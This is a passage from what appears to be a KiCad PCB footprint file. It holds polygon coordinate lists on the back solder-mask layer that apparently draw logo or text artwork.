1.305892 2.455333) (xy 1.565547 2.43917)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 7.62 -0.254) (xy 7.027333 -0.254) (xy 7.027333 2.413) (xy 7.62 2.413) (xy 7.62 -0.254)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 8.73125 3.674437) (xy 8.995833 3.661833) (xy 9.018361 1.354667) (xy 9.163453 1.354667) (xy 9.221573 1.35891) (xy 9.275645 1.378114) (xy 9.33597 1.421993) (xy 9.412853 1.500261) (xy 9.516595 1.622632) (xy 9.657499 1.798818) (xy 9.723689 1.882865) (xy 10.138833 2.411064) (xy 10.448248 2.412032) (xy 10.594445 2.40851) (xy 10.697539 2.398315) (xy 10.738336 2.383518) (xy 10.737758 2.380792) (xy 10.706113 2.338885) (xy 10.630238 2.241952) (xy 10.518855 2.10103) (xy 10.380688 1.927156) (xy 10.230982 1.73953) (xy 9.744112 1.130474) (xy 10.248389 0.460722) (xy 10.402722 0.254663) (xy 10.537968 0.072017) (xy 10.646411 -0.076627) (xy 10.720337 -0.180675) (xy 10.75203 -0.229538) (xy 10.752667 -0.231515) (xy 10.713819 -0.242351) (xy 10.611195 -0.250324) (xy 10.465676 -0.253929) (xy 10.440888 -0.254) (xy 10.129109 -0.254) (xy 9.71064 0.296333) (xy 9.55309 0.501947) (xy 9.435996 0.649073) (xy 9.349588 0.74738) (xy 9.284095 0.806539) (xy 9.229746 0.836221) (xy 9.17677 0.846096) (xy 9.154585 0.846667) (xy 9.017 0.846667) (xy 9.017 -0.254) (xy 8.466667 -0.254) (xy 8.466667 3.68704) (xy 8.73125 3.674437)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 6.118133 3.676738) (xy 6.186467 3.66129) (xy 6.192111 3.657444) (xy 6.17939 3.614971) (xy 6.12493 3.520288) (xy 6.038107 3.388686) (xy 5.958479 3.276444) (xy 5.69929 2.921) (xy 5.400228 2.9221) (xy 5.101167 2.9232) (xy 4.85775 3.259917) (xy 4.753802 3.407869) (xy 4.671987 3.532236) (xy 4.623209 3.616003) (xy 4.614333 3.639817) (xy 4.651795 3.667269) (xy 4.744986 3.682132) (xy 4.777526 3.683) (xy 4.870326 3.675349) (xy 4.949967 3.643362) (xy 5.038757 3.573493) (xy 5.159005 3.452193) (xy 5.160922 3.450167) (xy 5.268927 3.338805) (xy 5.353905 3.256458) (xy 5.40005 3.218328) (xy 5.403014 3.217333) (xy 5.440044 3.246314) (xy 5.517779 3.322877) (xy 5.620528 3.431456) (xy 5.637699 3.450167) (xy 5.755639 3.573191) (xy 5.842922 3.643778) (xy 5.921583 3.675765) (xy 6.008525 3.683) (xy 6.118133 3.676738)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 7.995895 3.677474) (xy 8.093657 3.663034) (xy 8.128 3.64418) (xy 8.100585 3.599404) (xy 8.026269 3.507783) (xy 7.916946 3.383394) (xy 7.806102 3.26318) (xy 7.66447 3.114052) (xy 7.56395 3.016099) (xy 7.487913 2.958567) (xy 7.419734 2.930705) (xy 7.342786 2.921762) (xy 7.276935 2.921) (xy 7.157601 2.9247) (xy 7.082682 2.934139) (xy 7.069667 2.94115) (xy 7.09278 2.981774) (xy 7.155246 3.075747) (xy 7.246752 3.207848) (xy 7.32778 3.32215) (xy 7.585894 3.683) (xy 7.856947 3.683) (xy 7.995895 3.677474)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -8.423685 4.73075) (xy -8.419996 4.533287) (xy -8.410493 4.363608) (xy -8.396692 4.241743) (xy -8.382896 4.191) (xy -8.309119 4.145755) (xy -8.159873 4.127891) (xy -8.126132 4.1275) (xy -7.995116 4.134063) (xy -7.903095 4.162099) (xy -7.843287 4.22413) (xy -7.808912 4.332678) (xy -7.793189 4.500263) (xy -7.789337 4.739407) (xy -7.789333 4.749425) (xy -7.789333 5.207) (xy -7.577667 5.207) (xy -7.577667 4.514817) (xy -7.580176 4.204248) (xy -7.589446 3.966915) (xy -7.608096 3.79149) (xy -7.638741 3.666644) (xy -7.683999 3.58105) (xy -7.746486 3.523378) (xy -7.814869 3.487946) (xy -7.918733 3.460315) (xy -8.063405 3.440636) (xy -8.22273 3.430043) (xy -8.370557 3.429673) (xy -8.48073 3.440658) (xy -8.523111 3.457222) (xy -8.546872 3.519064) (xy -8.551333 3.567862) (xy -8.542003 3.617386) (xy -8.499439 3.635213) (xy -8.401779 3.62764) (xy -8.363129 3.622057) (xy -8.199125 3.614331) (xy -8.037867 3.634334) (xy -7.904417 3.676201) (xy -7.823833 3.734063) (xy -7.814853 3.750422) (xy -7.795996 3.840871) (xy -7.789333 3.942863) (xy -7.793879 4.02807) (xy -7.821207 4.041743) (xy -7.88342 4.002901) (xy -8.010772 3.952832) (xy -8.177652 3.935959) (xy -8.348046 3.951424) (xy -8.485942 3.998372) (xy -8.514894 4.017902) (xy -8.55589 4.056013) (xy -8.584441 4.102779) (xy -8.603368 4.17381) (xy -8.615492 4.284714) (xy -8.623634 4.4511) (xy -8.629668 4.652902) (xy -8.644503 5.207) (xy -8.424333 5.207) (xy -8.423685 4.73075)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -9.948482 5.750263) (xy -9.9232 5.717698) (xy -9.910562 5.642607) (xy -9.906312 5.507959) (xy -9.906 5.418667) (xy -9.902348 5.261609) (xy -9.892643 5.143607) (xy -9.87876 5.084586) (xy -9.87425 5.081347) (xy -9.819125 5.105451) (xy -9.760326 5.144847) (xy -9.661418 5.183779) (xy -9.515581 5.203664) (xy -9.358673 5.203207) (xy -9.226551 5.181107) (xy -9.188003 5.16556) (xy -9.102129 5.072883) (xy -9.045264 4.905048) (xy -9.018815 4.666935) (xy -9.017 4.572) (xy -9.032913 4.311368) (xy -9.079714 4.119373) (xy -9.155998 4.000896) (xy -9.188003 3.97844) (xy -9.272735 3.955114) (xy -9.406342 3.940083) (xy -9.50105 3.937) (xy -9.661583 3.946405) (xy -9.765912 3.979352) (xy -9.821333 4.021667) (xy -9.882022 4.078929) (xy -9.903394 4.076324) (xy -9.906 4.021667) (xy -9.935934 3.950915) (xy -9.990667 3.937) (xy -10.018535 3.940154) (xy -10.039506 3.956632) (xy -10.05456 3.996959) (xy -10.064674 4.071661) (xy -10.07083 4.191262) (xy -10.074004 4.366289) (xy -10.074981 4.567033) (xy -9.884639 4.567033) (xy -9.881559 4.405398) (xy -9.867599 4.303901) (xy -9.836075 4.238121) (xy -9.780299 4.183632) (xy -9.779498 4.182982) (xy -9.681631 4.126371) (xy -9.561787 4.112742) (xy -9.488513 4.118521) (xy -9.366752 4.143583) (xy -9.281844 4.181624) (xy -9.266413 4.196974) (xy -9.248832 4.265031) (xy -9.235711 4.39229) (xy -9.229505 4.553309) (xy -9.229315 4.581608) (xy -9.231159 4.749212) (xy -9.241372 4.853887) (xy -9.265747 4.917329) (xy -9.310079 4.961235) (xy -9.33532 4.978597) (xy -9.475391 5.028654) (xy -9.596972 5.023326) (xy -9.732821 4.988471) (xy -9.8189 4.926206) (xy -9.865605 4.82004) (xy -9.883333 4.653482) (xy -9.884639 4.567033) (xy -10.074981 4.567033) (xy -10.075178 4.607266) (xy -10.075333 4.847167) (xy -10.07504 5.146748) (xy -10.073507 5.372189) (xy -10.069756 5.534013) (xy -10.062807 5.642748) (xy -10.051681 5.708916) (xy -10.0354 5.743045) (xy -10.012983 5.755659) (xy -9.990667 5.757333) (xy -9.948482 5.750263)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 3.26772 6.66288) (xy 3.506145 6.642926) (xy 3.6866 6.598501) (xy 3.817076 6.520466) (xy 3.905566 6.399685) (xy 3.960062 6.227019) (xy 3.988556 5.99333) (xy 3.99904 5.689479) (xy 4.000021 5.482167) (xy 3.997323 5.172736) (xy 3.987177 4.935743) (xy 3.965801 4.75904) (xy 3.929415 4.630478) (xy 3.87424 4.537908) (xy 3.796495 4.469183) (xy 3.692399 4.412152) (xy 3.662919 4.398786) (xy 3.503947 4.350858) (xy 3.288567 4.315947) (xy 3.04431 4.296007) (xy 2.798708 4.292992) (xy 2.579295 4.308854) (xy 2.521536 4.317795) (xy 2.299844 4.384079) (xy 2.137319 4.498384) (xy 2.016199 4.673369) (xy 2.012582 4.680565) (xy 1.98008 4.756332) (xy 1.957201 4.842164) (xy 1.942337 4.954013) (xy 1.933882 5.107831) (xy 1.930529 5.302168) (xy 2.415874 5.302168) (xy 2.416461 5.139788) (xy 2.424076 5.029232) (xy 2.440551 4.954114) (xy 2.467717 4.898044) (xy 2.49577 4.859193) (xy 2.595745 4.77235) (xy 2.735796 4.733122) (xy 2.763454 4.730228) (xy 2.888674 4.723271) (xy 2.982251 4.725327) (xy 2.998546 4.727852) (xy 3.078043 4.737181) (xy 3.193408 4.741321) (xy 3.199629 4.741333) (xy 3.346467 4.771704) (xy 3.429 4.826) (xy 3.463413 4.867924) (xy 3.48707 4.923019) (xy 3.501943 5.00662) (xy 3.510006 5.134063) (xy 3.51323 5.320681) (xy 3.513667 5.484091) (xy 3.513026 5.715065) (xy 3.509422 5.877265) (xy 3.500334 5.986584) (xy 3.483239 6.058916) (xy 3.455615 6.110151) (xy 3.414942 6.156182) (xy 3.405509 6.165673) (xy 3.346659 6.218532) (xy 3.285799 6.249462) (xy 3.200477 6.262978) (xy 3.068243 6.263593) (xy 2.941337 6.258999) (xy 2.756372 6.24909) (xy 2.623011 6.22895) (xy 2.53241 6.186249) (xy 2.475726 6.108655) (xy 2.444115 5.983839) (xy 2.428733 5.799468) (xy 2.420738 5.543213) (xy 2.420483 5.53276) (xy 2.415874 5.302168) (xy 1.930529 5.302168) (xy 1.930228 5.319568) (xy 1.929665 5.503333) (xy 1.930996 5.763389) (xy 1.936063 5.954794) (xy 1.946474 6.093538) (xy 1.963836 6.195612) (xy 1.989759 6.277004) (xy 2.012582 6.327655) (xy 2.085183 6.451437) (xy 2.171998 6.541792) (xy 2.28681 6.603645) (xy 2.443404 6.641925) (xy 2.655562 6.661559) (xy 2.93707 6.667472) (xy 2.963333 6.6675) (xy 3.26772 6.66288)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 5.827818 6.679357) (xy 5.946242 6.669233) (xy 6.223 6.639595) (xy 6.223 6.235112) (xy 5.716353 6.255978) (xy 5.449296 6.262029) (xy 5.255325 6.252254) (xy 5.1237 6.222716) (xy 5.043679 6.169478) (xy 5.004521 6.088603) (xy 4.995333 5.991689) (xy 5.009217 5.884673) (xy 5.043039 5.817937) (xy 5.047 5.815065) (xy 5.107371 5.79684) (xy 5.233096 5.771057) (xy 5.405581 5.741195) (xy 5.59903 5.711759) (xy 5.845216 5.672911) (xy 6.021617 5.632911) (xy 6.142871 5.5842) (xy 6.223617 5.519218) (xy 6.278493 5.430406) (xy 6.311377 5.343924) (xy 6.338279 5.195468) (xy 6.342076 5.009234) (xy 6.325268 4.816792) (xy 6.290356 4.649715) (xy 6.248643 4.551725) (xy 6.159416 4.455031) (xy 6.056298 4.382861) (xy 5.946065 4.348601) (xy 5.773639 4.321127) (xy 5.561345 4.302169) (xy 5.331505 4.293457) (xy 5.106443 4.296723) (xy 5.0165 4.302255) (xy 4.830274 4.318983) (xy 4.712745 4.340054) (xy 4.64812 4.375265) (xy 4.620604 4.43441) (xy 4.614405 4.527285) (xy 4.614333 4.551689) (xy 4.614333 4.74143) (xy 5.194904 4.738536) (xy 5.43153 4.738571) (xy 5.597726 4.742501) (xy 5.707698 4.751925) (xy 5.77565 4.768445) (xy 5.815789 4.793661) (xy 5.829904 4.810079) (xy 5.871135 4.911355) (xy 5.882355 5.036274) (xy 5.863416 5.146995) (xy 5.831417 5.196369) (xy 5.768749 5.219148) (xy 5.64273 5.24652) (xy 5.474226 5.274368) (xy 5.355167 5.290362) (xy 5.157779 5.318629) (xy 4.977207 5.351667) (xy 4.839934 5.384309) (xy 4.792726 5.400119) (xy 4.6573 5.501193) (xy 4.570242 5.67148) (xy 4.531729 5.91058) (xy 4.529667 5.992993) (xy 4.557273 6.243766) (xy 4.637803 6.439827) (xy 4.767823 6.573559) (xy 4.799958 6.592417) (xy 4.922928 6.632374) (xy 5.108673 6.662485) (xy 5.335719 6.681312) (xy 5.582592 6.687415) (xy 5.827818 6.679357)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 8.324029 6.65515) (xy 8.501834 6.597652) (xy 8.636279 6.506938) (xy 8.651394 6.492394) (xy 8.726042 6.399163) (xy 8.780706 6.280937) (xy 8.819682 6.121703) (xy 8.847264 5.905445) (xy 8.862485 5.705364) (xy 8.885745 5.335894) (xy 8.115405 5.324364) (xy 7.345066 5.312833) (xy 7.357944 5.1435) (xy 7.371221 5.016378) (xy 7.387633 4.91777) (xy 7.390986 4.904636) (xy 7.439091 4.832084) (xy 7.540227 4.779966) (xy 7.702096 4.746663) (xy 7.932402 4.730558) (xy 8.22325 4.72974) (xy 8.763 4.739314) (xy 8.763 4.554353) (xy 8.750061 4.421147) (xy 8.714205 4.351838) (xy 8.706522 4.347719) (xy 8.621626 4.331242) (xy 8.473889 4.31765) (xy 8.285105 4.307507) (xy 8.077069 4.301374) (xy 7.871574 4.299813) (xy 7.690415 4.303388) (xy 7.555385 4.31266) (xy 7.523871 4.317207) (xy 7.300441 4.373779) (xy 7.132437 4.45945) (xy 7.01235 4.58515) (xy 6.932674 4.761803) (xy 6.885902 5.000337) (xy 6.865808 5.275008) (xy 6.859671 5.63153) (xy 6.863644 5.712327) (xy 7.338546 5.712327) (xy 7.366061 5.693541) (xy 7.43511 5.681735) (xy 7.557953 5.675371) (xy 7.746851 5.672912) (xy 7.874408 5.672667) (xy 8.434208 5.672667) (xy 8.408682 5.767917) (xy 8.387063 5.891725) (xy 8.382578 5.960341) (xy 8.353159 6.056554) (xy 8.28268 6.156742) (xy 8.278091 6.161424) (xy 8.211393 6.217328) (xy 8.13467 6.248829) (xy 8.021995 6.262596) (xy 7.874 6.265333) (xy 7.708764 6.261597) (xy 7.602107 6.245944) (xy 7.5281 6.211706) (xy 7.469909 6.161424) (xy 7.386214 6.032825) (xy 7.366 5.932053) (xy 7.357531 5.817098) (xy 7.340304 5.739629) (xy 7.338546 5.712327) (xy 6.863644 5.712327) (xy 6.873661 5.916011) (xy 6.91089 6.139348) (xy 6.974467 6.312439) (xy 7.067502 6.446181) (xy 7.193107 6.551472) (xy 7.238103 6.579432) (xy 7.34106 6.625673) (xy 7.474309 6.656166) (xy 7.659173 6.674864) (xy 7.788293 6.681461) (xy 8.090352 6.682173) (xy 8.324029 6.65515)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 1.260116 6.172228) (xy 1.253299 5.758768) (xy 1.245287 5.421408) (xy 1.234667 5.151585) (xy 1.220025 4.940731) (xy 1.199946 4.780283) (xy 1.173017 4.661675) (xy 1.137824 4.576342) (xy 1.092954 4.515718) (xy 1.036993 4.471238) (xy 0.973667 4.43681) (xy 0.86201 4.400082) (xy 0.696561 4.365987) (xy 0.508127 4.340529) (xy 0.455083 4.335738) (xy 0.084667 4.306357) (xy 0.084667 4.783667) (xy 0.309409 4.783667) (xy 0.414641 4.783251) (xy 0.498952 4.78764) (xy 0.564813 4.805295) (xy 0.614694 4.844671) (xy 0.651067 4.914229) (xy 0.676404 5.022425) (xy 0.693175 5.177718) (xy 0.703853 5.388567) (xy 0.710908 5.663429) (xy 0.716812 6.010763) (xy 0.719667 6.187788) (xy 0.740833 7.471833) (xy 1.010231 7.484562) (xy 1.279628 7.49729) (xy 1.260116 6.172228)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 10.795 7.323667) (xy 10.583333 7.323667) (xy 10.401235 7.305483) (xy 10.284524 7.243886) (xy 10.22371 7.128308) (xy 10.209303 6.948181) (xy 10.210865 6.908865) (xy 10.2235 6.6675) (xy 10.50925 6.654983) (xy 10.795 6.642465) (xy 10.795 6.223) (xy 10.202333 6.223) (xy 10.202333 4.318) (xy 9.736667 4.318) (xy 9.736667 6.223) (xy 9.271 6.223) (xy 9.271 6.641909) (xy 9.49325 6.654705) (xy 9.7155 6.6675) (xy 9.737315 7.030184) (xy 9.759574 7.26456) (xy 9.802112 7.435903) (xy 9.877233 7.555596) (xy 9.997241 7.635027) (xy 10.174442 7.685581) (xy 10.421138 7.718642) (xy 10.488083 7.724888) (xy 10.795 7.752127) (xy 10.795 7.323667)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -4.276677 6.95325) (xy -4.280296 6.615821) (xy -4.293181 6.353351) (xy -4.320205 6.15625) (xy -4.366243 6.014924) (xy -4.43617 5.919782) (xy -4.53486 5.86123) (xy -4.667188 5.829676) (xy -4.838027 5.815529) (xy -4.855196 5.814792) (xy -5.019273 5.811263) (xy -5.153127 5.814189) (xy -5.231984 5.822899) (xy -5.23875 5.825173) (xy -5.28354 5.882686) (xy -5.291667 5.928556) (xy -5.283232 5.968807) (xy -5.246474 5.99226) (xy -5.164209 6.002915) (xy -5.019255 6.004768) (xy -4.966251 6.004268) (xy -4.796339 6.005066) (xy -4.688719 6.015668) (xy -4.621155 6.041107) (xy -4.571407 6.086415) (xy -4.564085 6.095263) (xy -4.509805 6.206948) (xy -4.48798 6.343623) (xy -4.487982 6.344107) (xy -4.495489 6.431158) (xy -4.51338 6.457842) (xy -4.519732 6.451588) (xy -4.623799 6.364611) (xy -4.776276 6.316282) (xy -4.949437 6.308215) (xy -5.115552 6.342027) (xy -5.23639 6.409835) (xy -5.290462 6.460221) (xy -5.324996 6.51195) (xy -5.344366 6.584388) (xy -5.352947 6.696896) (xy -5.355114 6.868838) (xy -5.355167 6.935591) (xy -5.355074 6.946874) (xy -5.164667 6.946874) (xy -5.157362 6.745724) (xy -5.136076 6.616665) (xy -5.11175 6.571406) (xy -4.974975 6.508546) (xy -4.811764 6.500152) (xy -4.656386 6.54339) (xy -4.557199 6.617293) (xy -4.513905 6.68573) (xy -4.493362 6.777275) (xy -4.491423 6.917071) (xy -4.495039 6.994122) (xy -4.509773 7.146085) (xy -4.532635 7.266016) (xy -4.557631 7.326231) (xy -4.655612 7.376559) (xy -4.796583 7.398289) (xy -4.943247 7.3897) (xy -5.05794 7.349312) (xy -5.111795 7.307472) (xy -5.143687 7.2551) (xy -5.159306 7.170745) (xy -5.164339 7.032955) (xy -5.164667 6.946874) (xy -5.355074 6.946874) (xy -5.353539 7.132235) (xy -5.346098 7.264142) (xy -5.32901 7.351222) (xy -5.298441 7.413381) (xy -5.252538 7.468423) (xy -5.178977 7.532659) (xy -5.093875 7.565654) (xy -4.966504 7.577019) (xy -4.903288 7.577667) (xy -4.741617 7.569468) (xy -4.636989 7.540368) (xy -4.572 7.493) (xy -4.511312 7.435738) (xy -4.48994 7.438343) (xy -4.487333 7.493) (xy -4.462529 7.559393) (xy -4.3815 7.577667) (xy -4.275667 7.577667) (xy -4.276677 6.95325)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -9.091083 8.162694) (xy -8.995833 8.149167) (xy -8.995833 6.328833) (xy -9.091083 6.315306) (xy -9.165655 6.323326) (xy -9.186332 6.388389) (xy -9.186333 6.389389) (xy -9.189759 6.448762) (xy -9.213737 6.4469) (xy -9.271 6.392333) (xy -9.347422 6.339616) (xy -9.457293 6.314213) (xy -9.599083 6.309013) (xy -9.745925 6.319008) (xy -9.865662 6.343305) (xy -9.914919 6.36538) (xy -10.000737 6.471047) (xy -10.053117 6.636878) (xy -10.074529 6.871703) (xy -10.075333 6.939106) (xy -10.075119 6.942667) (xy -9.863667 6.942667) (xy -9.861102 6.771052) (xy -9.850092 6.662913) (xy -9.825668 6.597129) (xy -9.782858 6.552579) (xy -9.769581 6.542901) (xy -9.621244 6.485385) (xy -9.455637 6.489873) (xy -9.310962 6.555121) (xy -9.30744 6.557927) (xy -9.254392 6.610754) (xy -9.224167 6.67735) (xy -9.210594 6.781473) (xy -9.2075 6.942667) (xy -9.210747 7.106562) (xy -9.224603 7.209665) (xy -9.255239 7.275734) (xy -9.30744 7.327407) (xy -9.450929 7.394411) (xy -9.616467 7.40069) (xy -9.765849 7.345003) (xy -9.769581 7.342433) (xy -9.817437 7.299811) (xy -9.845738 7.24092) (xy -9.859456 7.144642) (xy -9.86356 6.989856) (xy -9.863667 6.942667) (xy -10.075119 6.942667) (xy -10.059495 7.201859) (xy -10.012808 7.394812) (xy -9.936511 7.513636) (xy -9.90433 7.536227) (xy -9.790825 7.567773) (xy -9.634235 7.577483) (xy -9.469835 7.566741) (xy -9.3329 7.536928) (xy -9.28042 7.511766) (xy -9.186333 7.445866) (xy -9.186333 7.811044) (xy -9.185269 7.9867) (xy -9.179192 8.093667) (xy -9.163775 8.147922) (xy -9.13469 8.16544) (xy -9.091083 8.162694)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -7.88302 7.56675) (xy -7.741122 7.526013) (xy -7.651184 7.443479) (xy -7.597803 7.30717) (xy -7.574127 7.174725) (xy -7.559354 7.035965) (xy -7.555734 6.931872) (xy -7.561543 6.892174) (xy -7.610198 6.8778) (xy -7.724448 6.866407) (xy -7.885233 6.859452) (xy -8.00879 6.858) (xy -8.434917 6.858) (xy -8.407888 6.720417) (xy -8.370065 6.602841) (xy -8.302043 6.529061) (xy -8.188301 6.491485) (xy -8.013316 6.482519) (xy -7.926818 6.485064) (xy -7.768584 6.49028) (xy -7.676834 6.485851) (xy -7.633523 6.466947) (xy -7.620606 6.428739) (xy -7.619902 6.402917) (xy -7.624696 6.356239) (xy -7.650273 6.328181) (xy -7.7136 6.314248) (xy -7.831645 6.309942) (xy -7.96925 6.31035) (xy -8.144588 6.316027) (xy -8.296427 6.328676) (xy -8.39744 6.345826) (xy -8.410983 6.350296) (xy -8.50479 6.413102) (xy -8.562152 6.52028) (xy -8.590664 6.688445) (xy -8.594676 6.752167) (xy -8.602804 7.002106) (xy -8.602214 7.027333) (xy -8.434917 7.027333) (xy -8.090958 7.027333) (xy -7.921248 7.028668) (xy -7.819101 7.035867) (xy -7.767422 7.053723) (xy -7.749115 7.087027) (xy -7.747 7.123747) (xy -7.781137 7.272924) (xy -7.879602 7.369435) (xy -8.036476 7.407879) (xy -8.058809 7.408333) (xy -8.230956 7.387883) (xy -8.340535 7.320407) (xy -8.400716 7.196722) (xy -8.407888 7.164917) (xy -8.434917 7.027333) (xy -8.602214 7.027333) (xy -8.598553 7.18366) (xy -8.579645 7.312505) (xy -8.543801 7.404317) (xy -8.489758 7.473758) (xy -8.422023 7.530278) (xy -8.343832 7.561813) (xy -8.228752 7.575271) (xy -8.092281 7.577667) (xy -7.88302 7.56675)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -6.704296 7.568947) (xy -6.533048 7.559562) (xy -6.429474 7.544373) (xy -6.376597 7.519137) (xy -6.357939 7.482417) (xy -6.360152 7.444345) (xy -6.395731 7.42199) (xy -6.48101 7.411335) (xy -6.632319 7.408365) (xy -6.659213 7.408333) (xy -6.858021 7.399878) (xy -6.984637 7.370455) (xy -7.050217 7.313978) (xy -7.065918 7.22436) (xy -7.062333 7.188414) (xy -7.04585 7.136055) (xy -7.00209 7.100662) (xy -6.912528 7.073899) (xy -6.758639 7.047432) (xy -6.74418 7.045255) (xy -6.546651 7.009681) (xy -6.418969 6.965921) (xy -6.346409 6.901774) (xy -6.314246 6.805034) (xy -6.307667 6.683483) (xy -6.319171 6.525557) (xy -6.362128 6.418015) (xy -6.4492 6.351865) (xy -6.593052 6.318112) (xy -6.806346 6.307763) (xy -6.836833 6.307667) (xy -7.011257 6.308911) (xy -7.117739 6.315593) (xy -7.172999 6.332138) (xy -7.193757 6.36297) (xy -7.196762 6.402917) (xy -7.191753 6.452307) (xy -7.164406 6.479508) (xy -7.096431 6.489492) (xy -6.969536 6.487236) (xy -6.898462 6.484033) (xy -6.699649 6.483674) (xy -6.571147 6.508677) (xy -6.501012 6.564346) (xy -6.477297 6.655987) (xy -6.477 6.671194) (xy -6.495069 6.75084) (xy -6.558003 6.806271) (xy -6.678893 6.844016) (xy -6.870828 6.870605) (xy -6.878226 6.871338) (xy -7.056083 6.900696) (xy -7.165249 6.956653) (xy -7.221018 7.055097) (xy -7.238686 7.211917) (xy -7.239 7.246115) (xy -7.225885 7.389481) (xy -7.178485 7.48617) (xy -7.084714 7.543481) (xy -6.932489 7.568708) (xy -6.709726 7.569147) (xy -6.704296 7.568947)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -5.80946 7.573506) (xy -5.786532 7.552637) (xy -5.771539 7.502484) (xy -5.762803 7.410469) (xy -5.758648 7.264015) (xy -5.757397 7.050544) (xy -5.757333 6.942667) (xy -5.757888 6.698618) (xy -5.760671 6.526656) (xy -5.767358 6.414205) (xy -5.779627 6.348687) (xy -5.799154 6.317524) (xy -5.827617 6.30814) (xy -5.842 6.307667) (xy -5.87454 6.311828) (xy -5.897468 6.332697) (xy -5.912462 6.38285) (xy -5.921198 6.474865) (xy -5.925353 6.621319) (xy -5.926604 6.83479) (xy -5.926667 6.942667) (xy -5.926112 7.186716) (xy -5.92333 7.358677) (xy -5.916642 7.471129) (xy -5.904374 7.536647) (xy -5.884847 7.56781) (xy -5.856384 7.577194) (xy -5.842 7.577667) (xy -5.80946 7.573506)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -3.083561 7.566964) (xy -2.939125 7.513825) (xy -2.915107 7.496765) (xy -2.87411 7.458654) (xy -2.845559 7.411888) (xy -2.826632 7.340857) (xy -2.814508 7.229953) (xy -2.806366 7.063567) (xy -2.800332 6.861765) (xy -2.785498 6.307667) (xy -3.005667 6.307667) (xy -3.006315 6.783917) (xy -3.010005 6.98138) (xy -3.019507 7.151059) (xy -3.033309 7.272924) (xy -3.047104 7.323667) (xy -3.114997 7.364297) (xy -3.233643 7.384728) (xy -3.371496 7.384636) (xy -3.497009 7.363694) (xy -3.57066 7.329067) (xy -3.602053 7.288733) (xy -3.622728 7.219568) (xy -3.634684 7.106164) (xy -3.63992 6.933113) (xy -3.640667 6.789317) (xy -3.640667 6.307667) (xy -3.852333 6.307667) (xy -3.852333 6.942667) (xy -3.851779 7.186716) (xy -3.848996 7.358677) (xy -3.842309 7.471129) (xy -3.83004 7.536647) (xy -3.810513 7.56781) (xy -3.78205 7.577194) (xy -3.767667 7.577667) (xy -3.697407 7.548258) (xy -3.683 7.489928) (xy -3.683 7.402188) (xy -3.571458 7.489928) (xy -3.434428 7.554654) (xy -3.260229 7.580454) (xy -3.083561 7.566964)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -1.660966 7.568189) (xy -1.58499 7.542526) (xy -1.516689 7.49383) (xy -1.508341 7.486675) (xy -1.441283 7.416349) (xy -1.404702 7.334086) (xy -1.388227 7.210257) (xy -1.384613 7.133167) (xy -1.375833 6.879167) (xy -2.249729 6.854971) (xy -2.221572 6.718902) (xy -2.184242 6.603683) (xy -2.119104 6.53069) (xy -2.010191 6.492127) (xy -1.841539 6.480195) (xy -1.735667 6.48161) (xy -1.573281 6.484227) (xy -1.477952 6.477979) (xy -1.432214 6.458912) (xy -1.418601 6.42307) (xy -1.418167 6.409732) (xy -1.426426 6.370024) (xy -1.462115 6.344913) (xy -1.541605 6.330269) (xy -1.681266 6.321959) (xy -1.778 6.31891) (xy -2.017451 6.32112) (xy -2.179149 6.343506) (xy -2.241504 6.367239) (xy -2.3126 6.417115) (xy -2.360306 6.483089) (xy -2.389293 6.581869) (xy -2.404236 6.730164) (xy -2.409808 6.944685) (xy -2.410025 6.969727) (xy -2.409055 7.027333) (xy -2.250394 7.027333) (xy -1.566333 7.027333) (xy -1.566333 7.15131) (xy -1.597167 7.290398) (xy -1.691235 7.375263) (xy -1.850885 7.407836) (xy -1.878766 7.408333) (xy -2.047432 7.38836) (xy -2.154385 7.321488) (xy -2.21432 7.197295) (xy -2.221905 7.164917) (xy -2.250394 7.027333) (xy -2.409055 7.027333) (xy -2.406117 7.201773) (xy -2.383113 7.363127) (xy -2.330362 7.46734) (xy -2.237214 7.527964) (xy -2.093019 7.558552) (xy -1.938072 7.570287) (xy -1.770148 7.575787) (xy -1.660966 7.568189)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 0.042333 7.241944) (xy 0.042053 6.937919) (xy 0.040584 6.70817) (xy 0.036986 6.542308) (xy 0.030317 6.429945) (xy 0.019635 6.36069) (xy 0.003998 6.324154) (xy -0.017534 6.309948) (xy -0.042333 6.307667) (xy -0.112593 6.337075) (xy -0.127 6.395406) (xy -0.127 6.483145) (xy -0.238543 6.395406) (xy -0.371141 6.332673) (xy -0.541432 6.305807) (xy -0.714981 6.315463) (xy -0.857356 6.362298) (xy -0.88804 6.383044) (xy -0.965549 6.492662) (xy -1.016842 6.659093) (xy -1.041538 6.858519) (xy -1.040468 6.956171) (xy -0.848244 6.956171) (xy -0.835666 6.787182) (xy -0.799458 6.640645) (xy -0.740459 6.54082) (xy -0.706747 6.517622) (xy -0.582877 6.492073) (xy -0.437888 6.498737) (xy -0.306521 6.532543) (xy -0.223735 6.588117) (xy -0.191395 6.678986) (xy -0.173707 6.822697) (xy -0.170625 6.988713) (xy -0.182102 7.146494) (xy -0.20809 7.265502) (xy -0.224825 7.298706) (xy -0.311263 7.357838) (xy -0.444312 7.39227) (xy -0.588501 7.398077) (xy -0.708362 7.371334) (xy -0.735782 7.355263) (xy -0.799142 7.264471) (xy -0.836349 7.123354) (xy -0.848244 6.956171) (xy -1.040468 6.956171) (xy -1.039252 7.067125) (xy -1.009603 7.261092) (xy -0.952208 7.416603) (xy -0.90568 7.480169) (xy -0.822595 7.542208) (xy -0.715305 7.571413) (xy -0.582844 7.577667) (xy -0.417636 7.56406) (xy -0.291314 7.52786) (xy -0.265151 7.512979) (xy -0.172796 7.448291) (xy -0.160481 7.798729) (xy -0.152766 7.971152) (xy -0.141046 8.076486) (xy -0.120129 8.1323) 